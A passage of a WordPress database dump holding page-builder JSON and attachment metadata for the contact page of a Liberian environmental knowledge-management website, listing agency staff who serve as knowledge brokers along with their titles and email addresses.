href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24597,3585,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628454938;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3680;}i:1;a:1:{s:2:\"id\";i:3706;}i:2;a:1:{s:2:\"id\";i:3673;}}}}'),(24598,3633,'_wp_attached_file','2021/03/jwiagbe.png'),(24599,3633,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:19:\"2021/03/jwiagbe.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"jwiagbe-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"jwiagbe-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24607,3635,'_wp_attached_file','2021/03/reeves.png'),(24608,3635,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:18:\"2021/03/reeves.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"reeves-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"reeves-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24609,3636,'_wp_attached_file','2021/03/willabo.png'),(24610,3636,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:19:\"2021/03/willabo.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"willabo-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"willabo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24611,3637,'_wp_attached_file','2021/03/kullie.png'),(24612,3637,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:18:\"2021/03/kullie.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"kullie-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"kullie-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24613,3638,'_elementor_edit_mode','builder'),(24614,3638,'_elementor_template_type','wp-page'),(24615,3638,'_elementor_version','3.0.16'),(24616,3638,'_wp_page_template','default'),(24617,3638,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a 